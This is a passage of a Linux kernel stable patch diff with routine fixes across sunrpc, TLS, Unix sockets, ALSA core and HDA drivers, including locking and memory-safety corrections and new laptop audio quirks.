+-		inlen -= inlen > PAGE_SIZE ? PAGE_SIZE : inlen;
+-	}
+-
++	while (in_token->pages[i])
++		put_page(in_token->pages[i++]);
+ 	kfree(in_token->pages);
+ 	in_token->pages = NULL;
+ }
+@@ -1168,7 +1162,7 @@ static int gss_read_proxy_verf(struct svc_rqst *rqstp,
+ 	}
+ 
+ 	pages = DIV_ROUND_UP(inlen, PAGE_SIZE);
+-	in_token->pages = kcalloc(pages, sizeof(struct page *), GFP_KERNEL);
++	in_token->pages = kcalloc(pages + 1, sizeof(struct page *), GFP_KERNEL);
+ 	if (!in_token->pages) {
+ 		kfree(in_handle->data);
+ 		return SVC_DENIED;
+diff --git a/net/sunrpc/clnt.c b/net/sunrpc/clnt.c
+index b774028e4aa8f..1dbad41c46145 100644
+--- a/net/sunrpc/clnt.c
++++ b/net/sunrpc/clnt.c
+@@ -1047,6 +1047,7 @@ struct rpc_clnt *rpc_bind_new_program(struct rpc_clnt *old,
+ 		.authflavor	= old->cl_auth->au_flavor,
+ 		.cred		= old->cl_cred,
+ 		.stats		= old->cl_stats,
++		.timeout	= old->cl_timeout,
+ 	};
+ 	struct rpc_clnt *clnt;
+ 	int err;
+diff --git a/net/sunrpc/svc.c b/net/sunrpc/svc.c
+index 9b0b21cccca9a..666d738bcf07e 100644
+--- a/net/sunrpc/svc.c
++++ b/net/sunrpc/svc.c
+@@ -1205,8 +1205,6 @@ svc_generic_init_request(struct svc_rqst *rqstp,
+ 	if (rqstp->rq_proc >= versp->vs_nproc)
+ 		goto err_bad_proc;
+ 	rqstp->rq_procinfo = procp = &versp->vs_proc[rqstp->rq_proc];
+-	if (!procp)
+-		goto err_bad_proc;
+ 
+ 	/* Initialize storage for argp and resp */
+ 	memset(rqstp->rq_argp, 0, procp->pc_argzero);
+diff --git a/net/sunrpc/xprtrdma/verbs.c b/net/sunrpc/xprtrdma/verbs.c
+index 28c0771c4e8c3..4f71627ba39ce 100644
+--- a/net/sunrpc/xprtrdma/verbs.c
++++ b/net/sunrpc/xprtrdma/verbs.c
+@@ -244,7 +244,11 @@ rpcrdma_cm_event_handler(struct rdma_cm_id *id, struct rdma_cm_event *event)
+ 	case RDMA_CM_EVENT_DEVICE_REMOVAL:
+ 		pr_info("rpcrdma: removing device %s for %pISpc\n",
+ 			ep->re_id->device->name, sap);
+-		fallthrough;
++		switch (xchg(&ep->re_connect_status, -ENODEV)) {
++		case 0: goto wake_connect_worker;
++		case 1: goto disconnected;
++		}
++		return 0;
+ 	case RDMA_CM_EVENT_ADDR_CHANGE:
+ 		ep->re_connect_status = -ENODEV;
+ 		goto disconnected;
+diff --git a/net/tls/tls_main.c b/net/tls/tls_main.c
+index 6b7189a520af7..75cd20c0e3fdb 100644
+--- a/net/tls/tls_main.c
++++ b/net/tls/tls_main.c
+@@ -910,9 +910,17 @@ struct tls_context *tls_ctx_create(struct sock *sk)
+ 		return NULL;
+ 
+ 	mutex_init(&ctx->tx_lock);
+-	rcu_assign_pointer(icsk->icsk_ulp_data, ctx);
+ 	ctx->sk_proto = READ_ONCE(sk->sk_prot);
+ 	ctx->sk = sk;
++	/* Release semantic of rcu_assign_pointer() ensures that
++	 * ctx->sk_proto is visible before changing sk->sk_prot in
++	 * update_sk_prot(), and prevents reading uninitialized value in
++	 * tls_{getsockopt,setsockopt}. Note that we do not need a
++	 * read barrier in tls_{getsockopt,setsockopt} as there is an
++	 * address dependency between sk->sk_proto->{getsockopt,setsockopt}
++	 * and ctx->sk_proto.
++	 */
++	rcu_assign_pointer(icsk->icsk_ulp_data, ctx);
+ 	return ctx;
+ }
+ 
+diff --git a/net/unix/af_unix.c b/net/unix/af_unix.c
+index f28e2956fea58..7d2a3b42b456a 100644
+--- a/net/unix/af_unix.c
++++ b/net/unix/af_unix.c
+@@ -1121,8 +1121,8 @@ static struct sock *unix_find_other(struct net *net,
+ 
+ static int unix_autobind(struct sock *sk)
+ {
+-	unsigned int new_hash, old_hash = sk->sk_hash;
+ 	struct unix_sock *u = unix_sk(sk);
++	unsigned int new_hash, old_hash;
+ 	struct net *net = sock_net(sk);
+ 	struct unix_address *addr;
+ 	u32 lastnum, ordernum;
+@@ -1145,6 +1145,7 @@ static int unix_autobind(struct sock *sk)
+ 	addr->name->sun_family = AF_UNIX;
+ 	refcount_set(&addr->refcnt, 1);
+ 
++	old_hash = sk->sk_hash;
+ 	ordernum = get_random_u32();
+ 	lastnum = ordernum & 0xFFFFF;
+ retry:
+@@ -1185,8 +1186,8 @@ static int unix_bind_bsd(struct sock *sk, struct sockaddr_un *sunaddr,
+ {
+ 	umode_t mode = S_IFSOCK |
+ 	       (SOCK_INODE(sk->sk_socket)->i_mode & ~current_umask());
+-	unsigned int new_hash, old_hash = sk->sk_hash;
+ 	struct unix_sock *u = unix_sk(sk);
++	unsigned int new_hash, old_hash;
+ 	struct net *net = sock_net(sk);
+ 	struct user_namespace *ns; // barf...
+ 	struct unix_address *addr;
+@@ -1227,6 +1228,7 @@ static int unix_bind_bsd(struct sock *sk, struct sockaddr_un *sunaddr,
+ 	if (u->addr)
+ 		goto out_unlock;
+ 
++	old_hash = sk->sk_hash;
+ 	new_hash = unix_bsd_hash(d_backing_inode(dentry));
+ 	unix_table_double_lock(net, old_hash, new_hash);
+ 	u->path.mnt = mntget(parent.mnt);
+@@ -1254,8 +1256,8 @@ static int unix_bind_bsd(struct sock *sk, struct sockaddr_un *sunaddr,
+ static int unix_bind_abstract(struct sock *sk, struct sockaddr_un *sunaddr,
+ 			      int addr_len)
+ {
+-	unsigned int new_hash, old_hash = sk->sk_hash;
+ 	struct unix_sock *u = unix_sk(sk);
++	unsigned int new_hash, old_hash;
+ 	struct net *net = sock_net(sk);
+ 	struct unix_address *addr;
+ 	int err;
+@@ -1273,6 +1275,7 @@ static int unix_bind_abstract(struct sock *sk, struct sockaddr_un *sunaddr,
+ 		goto out_mutex;
+ 	}
+ 
++	old_hash = sk->sk_hash;
+ 	new_hash = unix_abstract_hash(addr->name, addr->len, sk->sk_type);
+ 	unix_table_double_lock(net, old_hash, new_hash);
+ 
+@@ -2137,13 +2140,15 @@ static int queue_oob(struct socket *sock, struct msghdr *msg, struct sock *other
+ 	maybe_add_creds(skb, sock, other);
+ 	skb_get(skb);
+ 
++	scm_stat_add(other, skb);
++
++	spin_lock(&other->sk_receive_queue.lock);
+ 	if (ousk->oob_skb)
+ 		consume_skb(ousk->oob_skb);
+-
+ 	WRITE_ONCE(ousk->oob_skb, skb);
++	__skb_queue_tail(&other->sk_receive_queue, skb);
++	spin_unlock(&other->sk_receive_queue.lock);
+ 
+-	scm_stat_add(other, skb);
+-	skb_queue_tail(&other->sk_receive_queue, skb);
+ 	sk_send_sigurg(other);
+ 	unix_state_unlock(other);
+ 	other->sk_data_ready(other);
+@@ -2189,7 +2194,7 @@ static int unix_stream_sendmsg(struct socket *sock, struct msghdr *msg,
+ 			goto out_err;
+ 	}
+ 
+-	if (sk->sk_shutdown & SEND_SHUTDOWN)
++	if (READ_ONCE(sk->sk_shutdown) & SEND_SHUTDOWN)
+ 		goto pipe_err;
+ 
+ 	while (sent < len) {
+@@ -2626,8 +2631,10 @@ static int unix_stream_recv_urg(struct unix_stream_read_state *state)
+ 
+ 	mutex_lock(&u->iolock);
+ 	unix_state_lock(sk);
++	spin_lock(&sk->sk_receive_queue.lock);
+ 
+ 	if (sock_flag(sk, SOCK_URGINLINE) || !u->oob_skb) {
++		spin_unlock(&sk->sk_receive_queue.lock);
+ 		unix_state_unlock(sk);
+ 		mutex_unlock(&u->iolock);
+ 		return -EINVAL;
+@@ -2639,6 +2646,8 @@ static int unix_stream_recv_urg(struct unix_stream_read_state *state)
+ 		WRITE_ONCE(u->oob_skb, NULL);
+ 	else
+ 		skb_get(oob_skb);
++
++	spin_unlock(&sk->sk_receive_queue.lock);
+ 	unix_state_unlock(sk);
+ 
+ 	chunk = state->recv_actor(oob_skb, 0, chunk, state);
+@@ -2667,6 +2676,10 @@ static struct sk_buff *manage_oob(struct sk_buff *skb, struct sock *sk,
+ 		consume_skb(skb);
+ 		skb = NULL;
+ 	} else {
++		struct sk_buff *unlinked_skb = NULL;
++
++		spin_lock(&sk->sk_receive_queue.lock);
++
+ 		if (skb == u->oob_skb) {
+ 			if (copied) {
+ 				skb = NULL;
+@@ -2678,13 +2691,19 @@ static struct sk_buff *manage_oob(struct sk_buff *skb, struct sock *sk,
+ 			} else if (flags & MSG_PEEK) {
+ 				skb = NULL;
+ 			} else {
+-				skb_unlink(skb, &sk->sk_receive_queue);
++				__skb_unlink(skb, &sk->sk_receive_queue);
+ 				WRITE_ONCE(u->oob_skb, NULL);
+-				if (!WARN_ON_ONCE(skb_unref(skb)))
+-					kfree_skb(skb);
++				unlinked_skb = skb;
+ 				skb = skb_peek(&sk->sk_receive_queue);
+ 			}
+ 		}
++
++		spin_unlock(&sk->sk_receive_queue.lock);
++
++		if (unlinked_skb) {
++			WARN_ON_ONCE(skb_unref(unlinked_skb));
++			kfree_skb(unlinked_skb);
++		}
+ 	}
+ 	return skb;
+ }
+diff --git a/net/wireless/trace.h b/net/wireless/trace.h
+index cb5c3224e038a..137937b1f4b39 100644
+--- a/net/wireless/trace.h
++++ b/net/wireless/trace.h
+@@ -1734,7 +1734,7 @@ TRACE_EVENT(rdev_return_void_tx_rx,
+ 
+ DECLARE_EVENT_CLASS(tx_rx_evt,
+ 	TP_PROTO(struct wiphy *wiphy, u32 tx, u32 rx),
+-	TP_ARGS(wiphy, rx, tx),
++	TP_ARGS(wiphy, tx, rx),
+ 	TP_STRUCT__entry(
+ 		WIPHY_ENTRY
+ 		__field(u32, tx)
+@@ -1751,7 +1751,7 @@ DECLARE_EVENT_CLASS(tx_rx_evt,
+ 
+ DEFINE_EVENT(tx_rx_evt, rdev_set_antenna,
+ 	TP_PROTO(struct wiphy *wiphy, u32 tx, u32 rx),
+-	TP_ARGS(wiphy, rx, tx)
++	TP_ARGS(wiphy, tx, rx)
+ );
+ 
+ DECLARE_EVENT_CLASS(wiphy_netdev_id_evt,
+diff --git a/scripts/kconfig/symbol.c b/scripts/kconfig/symbol.c
+index a76925b46ce63..7b1df55b01767 100644
+--- a/scripts/kconfig/symbol.c
++++ b/scripts/kconfig/symbol.c
+@@ -13,18 +13,21 @@
+ 
+ struct symbol symbol_yes = {
+ 	.name = "y",
++	.type = S_TRISTATE,
+ 	.curr = { "y", yes },
+ 	.flags = SYMBOL_CONST|SYMBOL_VALID,
+ };
+ 
+ struct symbol symbol_mod = {
+ 	.name = "m",
++	.type = S_TRISTATE,
+ 	.curr = { "m", mod },
+ 	.flags = SYMBOL_CONST|SYMBOL_VALID,
+ };
+ 
+ struct symbol symbol_no = {
+ 	.name = "n",
++	.type = S_TRISTATE,
+ 	.curr = { "n", no },
+ 	.flags = SYMBOL_CONST|SYMBOL_VALID,
+ };
+@@ -775,8 +778,7 @@ const char *sym_get_string_value(struct symbol *sym)
+ 		case no:
+ 			return "n";
+ 		case mod:
+-			sym_calc_value(modules_sym);
+-			return (modules_sym->curr.tri == no) ? "n" : "m";
++			return "m";
+ 		case yes:
+ 			return "y";
+ 		}
+diff --git a/sound/core/init.c b/sound/core/init.c
+index 5377f94eb2111..3f08104e9366b 100644
+--- a/sound/core/init.c
++++ b/sound/core/init.c
+@@ -307,8 +307,8 @@ static int snd_card_init(struct snd_card *card, struct device *parent,
+ 	card->number = idx;
+ #ifdef MODULE
+ 	WARN_ON(!module);
+-	card->module = module;
+ #endif
++	card->module = module;
+ 	INIT_LIST_HEAD(&card->devices);
+ 	init_rwsem(&card->controls_rwsem);
+ 	rwlock_init(&card->ctl_files_rwlock);
+@@ -518,6 +518,14 @@ int snd_card_disconnect(struct snd_card *card)
+ 	}
+ 	spin_unlock(&card->files_lock);	
+ 
++#ifdef CONFIG_PM
++	/* wake up sleepers here before other callbacks to avoid potential
++	 * deadlocks with other locks (e.g. in kctls); this also notifies
++	 * the shutdown, so sleepers will abort immediately
++	 */
++	wake_up_all(&card->power_sleep);
++#endif
++
+ 	/* notify all connected devices about disconnection */
+ 	/* at this point, they cannot respond to any calls except release() */
+ 
+@@ -533,6 +541,11 @@ int snd_card_disconnect(struct snd_card *card)
+ 		synchronize_irq(card->sync_irq);
+ 
+ 	snd_info_card_disconnect(card);
++#ifdef CONFIG_SND_DEBUG
++	debugfs_remove(card->debugfs_root);
++	card->debugfs_root = NULL;
++#endif
++
+ 	if (card->registered) {
+ 		device_del(&card->card_dev);
+ 		card->registered = false;
+@@ -545,7 +558,6 @@ int snd_card_disconnect(struct snd_card *card)
+ 	mutex_unlock(&snd_card_mutex);
+ 
+ #ifdef CONFIG_PM
+-	wake_up(&card->power_sleep);
+ 	snd_power_sync_ref(card);
+ #endif
+ 	return 0;	
+@@ -595,10 +607,6 @@ static int snd_card_do_free(struct snd_card *card)
+ 		dev_warn(card->dev, "unable to free card info\n");
+ 		/* Not fatal error */
+ 	}
+-#ifdef CONFIG_SND_DEBUG
+-	debugfs_remove(card->debugfs_root);
+-	card->debugfs_root = NULL;
+-#endif
+ 	if (card->release_completion)
+ 		complete(card->release_completion);
+ 	if (!card->managed)
+diff --git a/sound/core/jack.c b/sound/core/jack.c
+index 03d155ed362b4..bd795452e57bf 100644
+--- a/sound/core/jack.c
++++ b/sound/core/jack.c
+@@ -37,16 +37,18 @@ static const int jack_switch_types[SND_JACK_SWITCH_TYPES] = {
+ };
+ #endif /* CONFIG_SND_JACK_INPUT_DEV */
+ 
++static void snd_jack_remove_debugfs(struct snd_jack *jack);
++
+ static int snd_jack_dev_disconnect(struct snd_device *device)
+ {
+-#ifdef CONFIG_SND_JACK_INPUT_DEV
+ 	struct snd_jack *jack = device->device_data;
+ 
+-	mutex_lock(&jack->input_dev_lock);
+-	if (!jack->input_dev) {
+-		mutex_unlock(&jack->input_dev_lock);
++	snd_jack_remove_debugfs(jack);
++
++#ifdef CONFIG_SND_JACK_INPUT_DEV
++	guard(mutex)(&jack->input_dev_lock);
++	if (!jack->input_dev)
+ 		return 0;
+-	}
+ 
+ 	/* If the input device is registered with the input subsystem
+ 	 * then we need to use a different deallocator. */
+@@ -55,7 +57,6 @@ static int snd_jack_dev_disconnect(struct snd_device *device)
+ 	else
+ 		input_free_device(jack->input_dev);
+ 	jack->input_dev = NULL;
+-	mutex_unlock(&jack->input_dev_lock);
+ #endif /* CONFIG_SND_JACK_INPUT_DEV */
+ 	return 0;
+ }
+@@ -94,11 +95,9 @@ static int snd_jack_dev_register(struct snd_device *device)
+ 	snprintf(jack->name, sizeof(jack->name), "%s %s",
+ 		 card->shortname, jack->id);
+ 
+-	mutex_lock(&jack->input_dev_lock);
+-	if (!jack->input_dev) {
+-		mutex_unlock(&jack->input_dev_lock);
++	guard(mutex)(&jack->input_dev_lock);
++	if (!jack->input_dev)
+ 		return 0;
+-	}
+ 
+ 	jack->input_dev->name = jack->name;
+ 
+@@ -123,7 +122,6 @@ static int snd_jack_dev_register(struct snd_device *device)
+ 	if (err == 0)
+ 		jack->registered = 1;
+ 
+-	mutex_unlock(&jack->input_dev_lock);
+ 	return err;
+ }
+ #endif /* CONFIG_SND_JACK_INPUT_DEV */
+@@ -389,10 +387,14 @@ static int snd_jack_debugfs_add_inject_node(struct snd_jack *jack,
+ 	return 0;
+ }
+ 
+-static void snd_jack_debugfs_clear_inject_node(struct snd_jack_kctl *jack_kctl)
++static void snd_jack_remove_debugfs(struct snd_jack *jack)
+ {
+-	debugfs_remove(jack_kctl->jack_debugfs_root);
+-	jack_kctl->jack_debugfs_root = NULL;
++	struct snd_jack_kctl *jack_kctl;
++
++	list_for_each_entry(jack_kctl, &jack->kctl_list, list) {
++		debugfs_remove(jack_kctl->jack_debugfs_root);
++		jack_kctl->jack_debugfs_root = NULL;
++	}
+ }
+ #else /* CONFIG_SND_JACK_INJECTION_DEBUG */
+ static int snd_jack_debugfs_add_inject_node(struct snd_jack *jack,
+@@ -401,7 +403,7 @@ static int snd_jack_debugfs_add_inject_node(struct snd_jack *jack,
+ 	return 0;
+ }
+ 
+-static void snd_jack_debugfs_clear_inject_node(struct snd_jack_kctl *jack_kctl)
++static void snd_jack_remove_debugfs(struct snd_jack *jack)
+ {
+ }
+ #endif /* CONFIG_SND_JACK_INJECTION_DEBUG */
+@@ -412,7 +414,6 @@ static void snd_jack_kctl_private_free(struct snd_kcontrol *kctl)
+ 
+ 	jack_kctl = kctl->private_data;
+ 	if (jack_kctl) {
+-		snd_jack_debugfs_clear_inject_node(jack_kctl);
+ 		list_del(&jack_kctl->list);
+ 		kfree(jack_kctl);
+ 	}
+@@ -505,8 +506,8 @@ int snd_jack_new(struct snd_card *card, const char *id, int type,
+ 		.dev_free = snd_jack_dev_free,
+ #ifdef CONFIG_SND_JACK_INPUT_DEV
+ 		.dev_register = snd_jack_dev_register,
+-		.dev_disconnect = snd_jack_dev_disconnect,
+ #endif /* CONFIG_SND_JACK_INPUT_DEV */
++		.dev_disconnect = snd_jack_dev_disconnect,
+ 	};
+ 
+ 	if (initial_kctl) {
+@@ -588,14 +589,9 @@ EXPORT_SYMBOL(snd_jack_new);
+ void snd_jack_set_parent(struct snd_jack *jack, struct device *parent)
+ {
+ 	WARN_ON(jack->registered);
+-	mutex_lock(&jack->input_dev_lock);
+-	if (!jack->input_dev) {
+-		mutex_unlock(&jack->input_dev_lock);
+-		return;
+-	}
+-
+-	jack->input_dev->dev.parent = parent;
+-	mutex_unlock(&jack->input_dev_lock);
++	guard(mutex)(&jack->input_dev_lock);
++	if (jack->input_dev)
++		jack->input_dev->dev.parent = parent;
+ }
+ EXPORT_SYMBOL(snd_jack_set_parent);
+ 
+diff --git a/sound/core/timer.c b/sound/core/timer.c
+index e08a37c23add8..38f3b30efae70 100644
+--- a/sound/core/timer.c
++++ b/sound/core/timer.c
+@@ -553,6 +553,16 @@ static int snd_timer_start1(struct snd_timer_instance *timeri,
+ 		goto unlock;
+ 	}
+ 
++	/* check the actual time for the start tick;
++	 * bail out as error if it's way too low (< 100us)
++	 */
++	if (start) {
++		if ((u64)snd_timer_hw_resolution(timer) * ticks < 100000) {
++			result = -EINVAL;
++			goto unlock;
++		}
++	}
++
+ 	if (start)
+ 		timeri->ticks = timeri->cticks = ticks;
+ 	else if (!timeri->cticks)
+diff --git a/sound/hda/intel-dsp-config.c b/sound/hda/intel-dsp-config.c
+index bc03b5692983c..f1de386604a10 100644
+--- a/sound/hda/intel-dsp-config.c
++++ b/sound/hda/intel-dsp-config.c
+@@ -511,9 +511,32 @@ static const struct config_entry *snd_intel_dsp_find_config
+ 		if (table->codec_hid) {
+ 			int i;
+ 
+-			for (i = 0; i < table->codec_hid->num_codecs; i++)
+-				if (acpi_dev_present(table->codec_hid->codecs[i], NULL, -1))
++			for (i = 0; i < table->codec_hid->num_codecs; i++) {
++				struct nhlt_acpi_table *nhlt;
++				bool ssp_found = false;
++
++				if (!acpi_dev_present(table->codec_hid->codecs[i], NULL, -1))
++					continue;
++
++				nhlt = intel_nhlt_init(&pci->dev);
++				if (!nhlt) {
++					dev_warn(&pci->dev, "%s: NHLT table not found, skipped HID %s\n",
++						 __func__, table->codec_hid->codecs[i]);
++					continue;
++				}
++
++				if (intel_nhlt_has_endpoint_type(nhlt, NHLT_LINK_SSP) &&
++				    intel_nhlt_ssp_endpoint_mask(nhlt, NHLT_DEVICE_I2S))
++					ssp_found = true;
++
++				intel_nhlt_free(nhlt);
++
++				if (ssp_found)
+ 					break;
++
++				dev_warn(&pci->dev, "%s: no valid SSP found for HID %s, skipped\n",
++					 __func__, table->codec_hid->codecs[i]);
++			}
+ 			if (i == table->codec_hid->num_codecs)
+ 				continue;
+ 		}
+diff --git a/sound/pci/hda/hda_cs_dsp_ctl.c b/sound/pci/hda/hda_cs_dsp_ctl.c
+index 1622a22f96f6a..4a84ebe83157e 100644
+--- a/sound/pci/hda/hda_cs_dsp_ctl.c
++++ b/sound/pci/hda/hda_cs_dsp_ctl.c
+@@ -8,6 +8,7 @@
+ 
+ #include <linux/module.h>
+ #include <sound/soc.h>
++#include <linux/cleanup.h>
+ #include <linux/firmware/cirrus/cs_dsp.h>
+ #include <linux/firmware/cirrus/wmfw.h>
+ #include "hda_cs_dsp_ctl.h"
+@@ -97,11 +98,23 @@ static unsigned int wmfw_convert_flags(unsigned int in)
+ 	return out;
+ }
+ 
+-static void hda_cs_dsp_add_kcontrol(struct hda_cs_dsp_coeff_ctl *ctl, const char *name)
++static void hda_cs_dsp_free_kcontrol(struct snd_kcontrol *kctl)
+ {
++	struct hda_cs_dsp_coeff_ctl *ctl = (struct hda_cs_dsp_coeff_ctl *)snd_kcontrol_chip(kctl);
+ 	struct cs_dsp_coeff_ctl *cs_ctl = ctl->cs_ctl;
++
++	/* NULL priv to prevent a double-free in hda_cs_dsp_control_remove() */
++	cs_ctl->priv = NULL;
++	kfree(ctl);
++}
++
++static void hda_cs_dsp_add_kcontrol(struct cs_dsp_coeff_ctl *cs_ctl,
++				    const struct hda_cs_dsp_ctl_info *info,
++				    const char *name)
++{
+ 	struct snd_kcontrol_new kcontrol = {0};
+ 	struct snd_kcontrol *kctl;
++	struct hda_cs_dsp_coeff_ctl *ctl __free(kfree) = NULL;
+ 	int ret = 0;
+ 
+ 	if (cs_ctl->len > ADSP_MAX_STD_CTRL_SIZE) {
+@@ -110,6 +123,13 @@ static void hda_cs_dsp_add_kcontrol(struct hda_cs_dsp_coeff_ctl *ctl, const char
+ 		return;
+ 	}
+ 
++	ctl = kzalloc(sizeof(*ctl), GFP_KERNEL);
++	if (!ctl)
++		return;
++
++	ctl->cs_ctl = cs_ctl;
++	ctl->card = info->card;
++
+ 	kcontrol.name = name;
+ 	kcontrol.info = hda_cs_dsp_coeff_info;
+ 	kcontrol.iface = SNDRV_CTL_ELEM_IFACE_MIXER;
+@@ -117,20 +137,22 @@ static void hda_cs_dsp_add_kcontrol(struct hda_cs_dsp_coeff_ctl *ctl, const char
+ 	kcontrol.get = hda_cs_dsp_coeff_get;
+ 	kcontrol.put = hda_cs_dsp_coeff_put;
+ 
+-	/* Save ctl inside private_data, ctl is owned by cs_dsp,
+-	 * and will be freed when cs_dsp removes the control */
+ 	kctl = snd_ctl_new1(&kcontrol, (void *)ctl);
+ 	if (!kctl)
+ 		return;
+ 
+-	ret = snd_ctl_add(ctl->card, kctl);
++	kctl->private_free = hda_cs_dsp_free_kcontrol;
++	ctl->kctl = kctl;
++
++	/* snd_ctl_add() calls our private_free on error, which will kfree(ctl) */
++	cs_ctl->priv = no_free_ptr(ctl);
++	ret = snd_ctl_add(info->card, kctl);
+ 	if (ret) {
+ 		dev_err(cs_ctl->dsp->dev, "Failed to add KControl %s = %d\n", kcontrol.name, ret);
+ 		return;
+ 	}
+ 
+ 	dev_dbg(cs_ctl->dsp->dev, "Added KControl: %s\n", kcontrol.name);
+-	ctl->kctl = kctl;
+ }
+ 
+ static void hda_cs_dsp_control_add(struct cs_dsp_coeff_ctl *cs_ctl,
+@@ -138,7 +160,6 @@ static void hda_cs_dsp_control_add(struct cs_dsp_coeff_ctl *cs_ctl,
+ {
+ 	struct cs_dsp *cs_dsp = cs_ctl->dsp;
+ 	char name[SNDRV_CTL_ELEM_ID_NAME_MAXLEN];
+-	struct hda_cs_dsp_coeff_ctl *ctl;
+ 	const char *region_name;
+ 	int ret;
+ 
+@@ -163,15 +184,7 @@ static void hda_cs_dsp_control_add(struct cs_dsp_coeff_ctl *cs_ctl,
+ 			 " %.*s", cs_ctl->subname_len - skip, cs_ctl->subname + skip);
+ 	}
+ 
+-	ctl = kzalloc(sizeof(*ctl), GFP_KERNEL);
+-	if (!ctl)
+-		return;
+-
+-	ctl->cs_ctl = cs_ctl;
+-	ctl->card = info->card;
+-	cs_ctl->priv = ctl;
+-
+-	hda_cs_dsp_add_kcontrol(ctl, name);
++	hda_cs_dsp_add_kcontrol(cs_ctl, info, name);
+ }
+ 
+ void hda_cs_dsp_add_controls(struct cs_dsp *dsp, const struct hda_cs_dsp_ctl_info *info)
+@@ -203,7 +216,9 @@ void hda_cs_dsp_control_remove(struct cs_dsp_coeff_ctl *cs_ctl)
+ {
+ 	struct hda_cs_dsp_coeff_ctl *ctl = cs_ctl->priv;
+ 
+-	kfree(ctl);
++	/* ctl and kctl may already have been removed by ALSA private_free */
++	if (ctl && ctl->kctl)
++		snd_ctl_remove(ctl->card, ctl->kctl);
+ }
+ EXPORT_SYMBOL_NS_GPL(hda_cs_dsp_control_remove, SND_HDA_CS_DSP_CONTROLS);
+ 
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index f0b939862a2a6..3a7104f72cabd 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -7207,6 +7207,7 @@ enum {
+ 	ALC285_FIXUP_SPEAKER2_TO_DAC1,
+ 	ALC285_FIXUP_ASUS_SPEAKER2_TO_DAC1,
+ 	ALC285_FIXUP_ASUS_HEADSET_MIC,
++	ALC285_FIXUP_ASUS_SPI_REAR_SPEAKERS,
+ 	ALC285_FIXUP_ASUS_I2C_SPEAKER2_TO_DAC1,
+ 	ALC285_FIXUP_ASUS_I2C_HEADSET_MIC,
+ 	ALC280_FIXUP_HP_HEADSET_MIC,
+@@ -8214,6 +8215,15 @@ static const struct hda_fixup alc269_fixups[] = {
+ 		.chained = true,
+ 		.chain_id = ALC285_FIXUP_ASUS_SPEAKER2_TO_DAC1
+ 	},
++	[ALC285_FIXUP_ASUS_SPI_REAR_SPEAKERS] = {
++		.type = HDA_FIXUP_PINS,
++		.v.pins = (const struct hda_pintbl[]) {
++			{ 0x14, 0x90170120 },
++			{ }
++		},
++		.chained = true,
++		.chain_id = ALC285_FIXUP_ASUS_HEADSET_MIC
++	},
+ 	[ALC285_FIXUP_ASUS_I2C_SPEAKER2_TO_DAC1] = {
+ 		.type = HDA_FIXUP_FUNC,
+ 		.v.func = alc285_fixup_speaker2_to_dac1,
+@@ -9793,8 +9803,11 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x103c, 0x8c70, "HP EliteBook 835 G11", ALC287_FIXUP_CS35L41_I2C_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8c71, "HP EliteBook 845 G11", ALC287_FIXUP_CS35L41_I2C_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8c72, "HP EliteBook 865 G11", ALC287_FIXUP_CS35L41_I2C_2_HP_GPIO_LED),
++	SND_PCI_QUIRK(0x103c, 0x8c89, "HP ProBook 460 G11", ALC236_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8c8a, "HP EliteBook 630", ALC236_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8c8c, "HP EliteBook 660", ALC236_FIXUP_HP_GPIO_LED),
++	SND_PCI_QUIRK(0x103c, 0x8c8d, "HP ProBook 440 G11", ALC236_FIXUP_HP_GPIO_LED),
++	SND_PCI_QUIRK(0x103c, 0x8c8e, "HP ProBook 460 G11", ALC236_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8c90, "HP EliteBook 640", ALC236_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8c91, "HP EliteBook 660", ALC236_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8c96, "HP", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
+@@ -9857,6 +9870,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x1043, 0x1c23, "Asus X55U", ALC269_FIXUP_LIMIT_INT_MIC_BOOST),
+ 	SND_PCI_QUIRK(0x1043, 0x1c62, "ASUS GU603", ALC289_FIXUP_ASUS_GA401),
+ 	SND_PCI_QUIRK(0x1043, 0x1c92, "ASUS ROG Strix G15", ALC285_FIXUP_ASUS_G533Z_PINS),
++	SND_PCI_QUIRK(0x1043, 0x1caf, "ASUS G634JYR/JZR", ALC285_FIXUP_ASUS_SPI_REAR_SPEAKERS),
+ 	SND_PCI_QUIRK(0x1043, 0x1ccd, "ASUS X555UB", ALC256_FIXUP_ASUS_MIC),
+ 	SND_PCI_QUIRK(0x1043, 0x1d1f, "ASUS ROG Strix G17 2023 (G713PV)", ALC287_FIXUP_CS35L41_I2C_2),
+ 	SND_PCI_QUIRK(0x1043, 0x1d42, "ASUS Zephyrus G14 2022", ALC289_FIXUP_ASUS_GA401),
+@@ -9879,7 +9893,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x1043, 0x3030, "ASUS ZN270IE", ALC256_FIXUP_ASUS_AIO_GPIO2),
+ 	SND_PCI_QUIRK(0x1043, 0x3a20, "ASUS G614JZR", ALC245_FIXUP_CS35L41_SPI_2),
+ 	SND_PCI_QUIRK(0x1043, 0x3a30, "ASUS G814JVR/JIR", ALC245_FIXUP_CS35L41_SPI_2),
+-	SND_PCI_QUIRK(0x1043, 0x3a40, "ASUS G814JZR", ALC245_FIXUP_CS35L41_SPI_2),
++	SND_PCI_QUIRK(0x1043, 0x3a40, "ASUS G814JZR", ALC285_FIXUP_ASUS_SPI_REAR_SPEAKERS),
+ 	SND_PCI_QUIRK(0x1043, 0x3a50, "ASUS G834JYR/JZR", ALC245_FIXUP_CS35L41_SPI_2),
+ 	SND_PCI_QUIRK(0x1043, 0x3a60, "ASUS G634JYR/JZR", ALC245_FIXUP_CS35L41_SPI_2),
+ 	SND_PCI_QUIRK(0x1043, 0x831a, "ASUS P901", ALC269_FIXUP_STEREO_DMIC),
